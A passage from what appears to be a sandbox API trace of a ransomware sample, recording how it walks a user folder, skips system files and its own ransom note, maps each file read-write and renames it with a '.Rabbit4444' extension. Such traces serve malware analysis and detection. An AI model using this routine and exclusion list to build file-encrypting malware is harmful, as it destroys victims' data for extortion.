dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.073] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.073] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0068.073] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.073] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0068.073] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.073] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0068.073] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.073] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0068.073] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15938417648) returned 1 [0068.073] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0068.074] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0068.074] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.074] CloseHandle (hObject=0x29c) returned 1 [0068.074] CloseHandle (hObject=0x280) returned 1 [0068.074] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8428D171-5820-4E58-8DDB-7ED13951D0DF}.Rabbit4444") returned 156 [0068.074] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8428D171-5820-4E58-8DDB-7ED13951D0DF}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{8428d171-5820-4e58-8ddb-7ed13951d0df}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8428D171-5820-4E58-8DDB-7ED13951D0DF}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{8428d171-5820-4e58-8ddb-7ed13951d0df}.rabbit4444"), dwFlags=0x1) returned 1 [0068.075] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aaa084b, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9aaa084b, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x44847f9f, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{89401BAE-1680-4ACA-85C1-003BB13BCBCC}", cAlternateFileName="{89401~1")) returned 1 [0068.075] lstrcmpiW (lpString1="{89401BAE-1680-4ACA-85C1-003BB13BCBCC}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.075] lstrcmpiW (lpString1="{89401BAE-1680-4ACA-85C1-003BB13BCBCC}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.075] lstrcmpiW (lpString1="{89401BAE-1680-4ACA-85C1-003BB13BCBCC}", lpString2="Rabbit4444.exe") returned -1 [0068.075] lstrcmpiW (lpString1="{89401BAE-1680-4ACA-85C1-003BB13BCBCC}", lpString2=".") returned 1 [0068.075] lstrcmpiW (lpString1="{89401BAE-1680-4ACA-85C1-003BB13BCBCC}", lpString2="..") returned 1 [0068.075] lstrcmpiW (lpString1="{89401BAE-1680-4ACA-85C1-003BB13BCBCC}", lpString2="windows") returned -1 [0068.075] lstrcmpiW (lpString1="{89401BAE-1680-4ACA-85C1-003BB13BCBCC}", lpString2="bootmgr") returned -1 [0068.075] lstrcmpiW (lpString1="{89401BAE-1680-4ACA-85C1-003BB13BCBCC}", lpString2="pagefile.sys") returned -1 [0068.075] lstrcmpiW (lpString1="{89401BAE-1680-4ACA-85C1-003BB13BCBCC}", lpString2="boot") returned -1 [0068.075] lstrcmpiW (lpString1="{89401BAE-1680-4ACA-85C1-003BB13BCBCC}", lpString2="ids.txt") returned -1 [0068.075] lstrcmpiW (lpString1="{89401BAE-1680-4ACA-85C1-003BB13BCBCC}", lpString2="NTUSER.DAT") returned -1 [0068.075] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{89401BAE-1680-4ACA-85C1-003BB13BCBCC}" | out: lpString1="{89401BAE-1680-4ACA-85C1-003BB13BCBCC}") returned="{89401BAE-1680-4ACA-85C1-003BB13BCBCC}" [0068.075] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{89401BAE-1680-4ACA-85C1-003BB13BCBCC}", dwFileAttributes=0x0) returned 1 [0068.075] lstrlenW (lpString="{89401BAE-1680-4ACA-85C1-003BB13BCBCC}") returned 38 [0068.075] lstrlenW (lpString="Rabbit4444") returned 10 [0068.075] lstrcmpiW (lpString1="BB13BCBCC}", lpString2="Rabbit4444") returned -1 [0068.075] lstrlenW (lpString=".dll") returned 4 [0068.075] lstrcmpiW (lpString1="BCC}", lpString2=".dll") returned 1 [0068.075] lstrlenW (lpString=".lnk") returned 4 [0068.075] lstrcmpiW (lpString1="BCC}", lpString2=".lnk") returned 1 [0068.075] lstrlenW (lpString=".ini") returned 4 [0068.075] lstrcmpiW (lpString1="BCC}", lpString2=".ini") returned 1 [0068.075] lstrlenW (lpString=".sys") returned 4 [0068.075] lstrcmpiW (lpString1="BCC}", lpString2=".sys") returned 1 [0068.075] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{89401BAE-1680-4ACA-85C1-003BB13BCBCC}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{89401bae-1680-4aca-85c1-003bb13bcbcc}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.076] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.076] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15938660557) returned 1 [0068.076] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.076] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0068.076] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0068.076] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.077] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0068.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0068.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0068.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0068.078] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15938926258) returned 1 [0068.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0068.079] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0068.079] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.079] CloseHandle (hObject=0x29c) returned 1 [0068.079] CloseHandle (hObject=0x280) returned 1 [0068.079] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{89401BAE-1680-4ACA-85C1-003BB13BCBCC}.Rabbit4444") returned 156 [0068.079] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{89401BAE-1680-4ACA-85C1-003BB13BCBCC}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{89401bae-1680-4aca-85c1-003bb13bcbcc}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{89401BAE-1680-4ACA-85C1-003BB13BCBCC}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{89401bae-1680-4aca-85c1-003bb13bcbcc}.rabbit4444"), dwFlags=0x1) returned 1 [0068.080] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aaa084b, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9aaa084b, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x44847f9f, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{8C4A08B7-5CDB-4669-9FDA-D68576361570}", cAlternateFileName="{8C4A0~1")) returned 1 [0068.080] lstrcmpiW (lpString1="{8C4A08B7-5CDB-4669-9FDA-D68576361570}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.080] lstrcmpiW (lpString1="{8C4A08B7-5CDB-4669-9FDA-D68576361570}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.080] lstrcmpiW (lpString1="{8C4A08B7-5CDB-4669-9FDA-D68576361570}", lpString2="Rabbit4444.exe") returned -1 [0068.080] lstrcmpiW (lpString1="{8C4A08B7-5CDB-4669-9FDA-D68576361570}", lpString2=".") returned 1 [0068.080] lstrcmpiW (lpString1="{8C4A08B7-5CDB-4669-9FDA-D68576361570}", lpString2="..") returned 1 [0068.080] lstrcmpiW (lpString1="{8C4A08B7-5CDB-4669-9FDA-D68576361570}", lpString2="windows") returned -1 [0068.080] lstrcmpiW (lpString1="{8C4A08B7-5CDB-4669-9FDA-D68576361570}", lpString2="bootmgr") returned -1 [0068.080] lstrcmpiW (lpString1="{8C4A08B7-5CDB-4669-9FDA-D68576361570}", lpString2="pagefile.sys") returned -1 [0068.080] lstrcmpiW (lpString1="{8C4A08B7-5CDB-4669-9FDA-D68576361570}", lpString2="boot") returned -1 [0068.080] lstrcmpiW (lpString1="{8C4A08B7-5CDB-4669-9FDA-D68576361570}", lpString2="ids.txt") returned -1 [0068.080] lstrcmpiW (lpString1="{8C4A08B7-5CDB-4669-9FDA-D68576361570}", lpString2="NTUSER.DAT") returned -1 [0068.080] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{8C4A08B7-5CDB-4669-9FDA-D68576361570}" | out: lpString1="{8C4A08B7-5CDB-4669-9FDA-D68576361570}") returned="{8C4A08B7-5CDB-4669-9FDA-D68576361570}" [0068.080] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8C4A08B7-5CDB-4669-9FDA-D68576361570}", dwFileAttributes=0x0) returned 1 [0068.080] lstrlenW (lpString="{8C4A08B7-5CDB-4669-9FDA-D68576361570}") returned 38 [0068.080] lstrlenW (lpString="Rabbit4444") returned 10 [0068.080] lstrcmpiW (lpString1="576361570}", lpString2="Rabbit4444") returned -1 [0068.080] lstrlenW (lpString=".dll") returned 4 [0068.080] lstrcmpiW (lpString1="570}", lpString2=".dll") returned 1 [0068.080] lstrlenW (lpString=".lnk") returned 4 [0068.081] lstrcmpiW (lpString1="570}", lpString2=".lnk") returned 1 [0068.081] lstrlenW (lpString=".ini") returned 4 [0068.081] lstrcmpiW (lpString1="570}", lpString2=".ini") returned 1 [0068.081] lstrlenW (lpString=".sys") returned 4 [0068.081] lstrcmpiW (lpString1="570}", lpString2=".sys") returned 1 [0068.081] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8C4A08B7-5CDB-4669-9FDA-D68576361570}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{8c4a08b7-5cdb-4669-9fda-d68576361570}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.081] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.081] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15939180350) returned 1 [0068.081] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.081] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0068.081] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0068.081] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.082] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.083] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.083] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0068.083] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.083] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0068.083] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.083] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0068.084] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.084] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0068.084] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15939433652) returned 1 [0068.084] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0068.084] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0068.084] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.084] CloseHandle (hObject=0x29c) returned 1 [0068.084] CloseHandle (hObject=0x280) returned 1 [0068.084] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8C4A08B7-5CDB-4669-9FDA-D68576361570}.Rabbit4444") returned 156 [0068.084] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8C4A08B7-5CDB-4669-9FDA-D68576361570}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{8c4a08b7-5cdb-4669-9fda-d68576361570}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8C4A08B7-5CDB-4669-9FDA-D68576361570}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{8c4a08b7-5cdb-4669-9fda-d68576361570}.rabbit4444"), dwFlags=0x1) returned 1 [0068.085] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ad02de6, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9ad02de6, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x449790fd, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{8CBD0221-57D1-4FDF-9D21-5922534D0822}", cAlternateFileName="{8CBD0~1")) returned 1 [0068.085] lstrcmpiW (lpString1="{8CBD0221-57D1-4FDF-9D21-5922534D0822}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.085] lstrcmpiW (lpString1="{8CBD0221-57D1-4FDF-9D21-5922534D0822}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.085] lstrcmpiW (lpString1="{8CBD0221-57D1-4FDF-9D21-5922534D0822}", lpString2="Rabbit4444.exe") returned -1 [0068.085] lstrcmpiW (lpString1="{8CBD0221-57D1-4FDF-9D21-5922534D0822}", lpString2=".") returned 1 [0068.085] lstrcmpiW (lpString1="{8CBD0221-57D1-4FDF-9D21-5922534D0822}", lpString2="..") returned 1 [0068.085] lstrcmpiW (lpString1="{8CBD0221-57D1-4FDF-9D21-5922534D0822}", lpString2="windows") returned -1 [0068.085] lstrcmpiW (lpString1="{8CBD0221-57D1-4FDF-9D21-5922534D0822}", lpString2="bootmgr") returned -1 [0068.085] lstrcmpiW (lpString1="{8CBD0221-57D1-4FDF-9D21-5922534D0822}", lpString2="pagefile.sys") returned -1 [0068.085] lstrcmpiW (lpString1="{8CBD0221-57D1-4FDF-9D21-5922534D0822}", lpString2="boot") returned -1 [0068.085] lstrcmpiW (lpString1="{8CBD0221-57D1-4FDF-9D21-5922534D0822}", lpString2="ids.txt") returned -1 [0068.085] lstrcmpiW (lpString1="{8CBD0221-57D1-4FDF-9D21-5922534D0822}", lpString2="NTUSER.DAT") returned -1 [0068.085] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{8CBD0221-57D1-4FDF-9D21-5922534D0822}" | out: lpString1="{8CBD0221-57D1-4FDF-9D21-5922534D0822}") returned="{8CBD0221-57D1-4FDF-9D21-5922534D0822}" [0068.085] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8CBD0221-57D1-4FDF-9D21-5922534D0822}", dwFileAttributes=0x0) returned 1 [0068.086] lstrlenW (lpString="{8CBD0221-57D1-4FDF-9D21-5922534D0822}") returned 38 [0068.086] lstrlenW (lpString="Rabbit4444") returned 10 [0068.086] lstrcmpiW (lpString1="2534D0822}", lpString2="Rabbit4444") returned -1 [0068.086] lstrlenW (lpString=".dll") returned 4 [0068.086] lstrcmpiW (lpString1="822}", lpString2=".dll") returned 1 [0068.086] lstrlenW (lpString=".lnk") returned 4 [0068.086] lstrcmpiW (lpString1="822}", lpString2=".lnk") returned 1 [0068.086] lstrlenW (lpString=".ini") returned 4 [0068.086] lstrcmpiW (lpString1="822}", lpString2=".ini") returned 1 [0068.086] lstrlenW (lpString=".sys") returned 4 [0068.086] lstrcmpiW (lpString1="822}", lpString2=".sys") returned 1 [0068.086] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8CBD0221-57D1-4FDF-9D21-5922534D0822}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{8cbd0221-57d1-4fdf-9d21-5922534d0822}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.087] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.087] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15939733165) returned 1 [0068.087] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.087] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0068.087] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0068.087] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.088] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.089] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.089] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0068.089] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.089] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0068.089] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.089] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0068.089] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.089] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0068.089] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15940021132) returned 1 [0068.090] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0068.090] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0068.090] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.090] CloseHandle (hObject=0x29c) returned 1 [0068.090] CloseHandle (hObject=0x280) returned 1 [0068.090] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8CBD0221-57D1-4FDF-9D21-5922534D0822}.Rabbit4444") returned 156 [0068.090] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8CBD0221-57D1-4FDF-9D21-5922534D0822}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{8cbd0221-57d1-4fdf-9d21-5922534d0822}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8CBD0221-57D1-4FDF-9D21-5922534D0822}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{8cbd0221-57d1-4fdf-9d21-5922534d0822}.rabbit4444"), dwFlags=0x1) returned 1 [0068.091] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ad29032, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9ad29032, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x44847f9f, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{8E1A4C76-0757-46CC-AC4A-23B132F1BB0B}", cAlternateFileName="{8E1A4~1")) returned 1 [0068.091] lstrcmpiW (lpString1="{8E1A4C76-0757-46CC-AC4A-23B132F1BB0B}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.091] lstrcmpiW (lpString1="{8E1A4C76-0757-46CC-AC4A-23B132F1BB0B}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.091] lstrcmpiW (lpString1="{8E1A4C76-0757-46CC-AC4A-23B132F1BB0B}", lpString2="Rabbit4444.exe") returned -1 [0068.091] lstrcmpiW (lpString1="{8E1A4C76-0757-46CC-AC4A-23B132F1BB0B}", lpString2=".") returned 1 [0068.091] lstrcmpiW (lpString1="{8E1A4C76-0757-46CC-AC4A-23B132F1BB0B}", lpString2="..") returned 1 [0068.091] lstrcmpiW (lpString1="{8E1A4C76-0757-46CC-AC4A-23B132F1BB0B}", lpString2="windows") returned -1 [0068.091] lstrcmpiW (lpString1="{8E1A4C76-0757-46CC-AC4A-23B132F1BB0B}", lpString2="bootmgr") returned -1 [0068.091] lstrcmpiW (lpString1="{8E1A4C76-0757-46CC-AC4A-23B132F1BB0B}", lpString2="pagefile.sys") returned -1 [0068.091] lstrcmpiW (lpString1="{8E1A4C76-0757-46CC-AC4A-23B132F1BB0B}", lpString2="boot") returned -1 [0068.091] lstrcmpiW (lpString1="{8E1A4C76-0757-46CC-AC4A-23B132F1BB0B}", lpString2="ids.txt") returned -1 [0068.091] lstrcmpiW (lpString1="{8E1A4C76-0757-46CC-AC4A-23B132F1BB0B}", lpString2="NTUSER.DAT") returned -1 [0068.091] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{8E1A4C76-0757-46CC-AC4A-23B132F1BB0B}" | out: lpString1="{8E1A4C76-0757-46CC-AC4A-23B132F1BB0B}") returned="{8E1A4C76-0757-46CC-AC4A-23B132F1BB0B}" [0068.091] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{8E1A4C76-0757-46CC-AC4A-23B132F1BB0B}", dwFileAttributes=0x0) returned 1 [0068.092] lstrlenW (lpString="{8E1A4C76-0757-46CC-AC4A-23B132F1BB0B}") returned 38 [0068.092] lstrlenW (lpString="Rabbit4444") returned 10 [0068.092] lstrcmpiW (lpString1="132F1BB0B}", lpString2="Rabbit4444") returned -1 [0068.092] lstrlenW (lpString=".dll") returned 4 [0068.092] lstrcmpiW (lpString1="B0B}", 